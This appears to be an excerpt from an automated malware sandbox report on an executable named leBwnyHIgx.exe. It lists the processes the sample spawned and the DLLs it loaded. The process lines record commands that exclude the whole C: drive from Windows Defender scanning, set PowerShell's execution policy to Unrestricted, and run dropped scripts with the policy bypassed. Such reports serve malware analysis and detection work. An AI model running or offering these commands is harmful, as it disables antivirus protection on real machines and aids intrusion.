                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
